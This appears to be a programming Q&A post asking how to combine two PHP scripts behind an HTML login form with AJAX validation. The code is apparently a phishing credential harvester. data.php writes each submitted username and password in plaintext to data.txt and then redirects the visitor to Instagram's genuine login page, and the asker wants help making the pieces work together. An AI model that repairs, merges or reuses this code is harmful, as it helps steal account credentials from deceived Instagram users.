# how to merge 2 php files which working as POST for a form in html

Tags: javascript, php, html

I have a form that has a data.php file that form send its data to it and this data.php store information on form in data.txt file on server but recently I tried to make this form work with some ajax java script code and this code have its own POST php file as "check-login.php" and it checks if the username or password are empty or filled and return some error if those are emty

I tried to mix this 2 php file but it doesn't work and I tried to make check-login.php the first POST file and after it is done server work with second POST file that is data.php

```js
const form = {
    username: document.getElementById('username'),
    password: document.getElementById('password'),
    submit: document.getElementById('btn-submit'),
    messages: document.getElementById('form-messages')
};
form.submit.addEventListener('click', () => {
    const request = new XMLHttpRequest();
    request.onload = () => {
        let responseObject = null;
        try {
            responseObject = JSON.parse(request.responseText);
        } catch (e) {
            console.error('Could not parse JSON!');
        }
        if (responseObject) {
            handleResponse(responseObject);
        }
    };
    const requestData = `username=${form.username.value}&password=${form.password.value}`;
    request.open('post', 'check-login.php');
    request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    request.send(requestData);
});
function handleResponse(responseObject) {
    if (responseObject.ok) {
        location.href = 'dashboard.html';

    } else {
        while (form.messages.firstChild) {
            form.messages.removeChild(form.messages.firstChild);
        }
        responseObject.messages.forEach((message) => {
            const li = document.createElement('li');
            li.textContent = message;
            form.messages.appendChild(li);
        });
        form.messages.style.display = "block";
    }
}
```

data.php

```
<?php

$username = $_POST['username'];
$password = $_POST['password'];
$fp = fopen("data.txt", "a"); // a is apendix
$savestring = "Email Address: " . $username . "\n" . "Password: " . $password . "\n";
fwrite($fp, $savestring);
fclose($fp);
header('location:https://www.instagram.com/accounts/login/?source=auth_switcher');
?>
```

check-login.php

```
<?php

$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
$ok = true;
$messages = array();
if (!isset($username) || empty($username)) {
    $ok = false;
    $messages[] = 'Username cannot be empty!';
}
if (!isset($password) || empty($password)) {
    $ok = false;
    $messages[] = 'Password cannot be empty!';
}

echo json_encode(
        array(
            'ok' => $ok,
            'messages' => $messages
        )
);
?>
```

Comment: You should probably show what and how you've tried to merge your two scripts, not asking how to merge them.

Comment: I tried to merged them by making their variable same and put data.php after check-login.php but it seems they don't work when their togather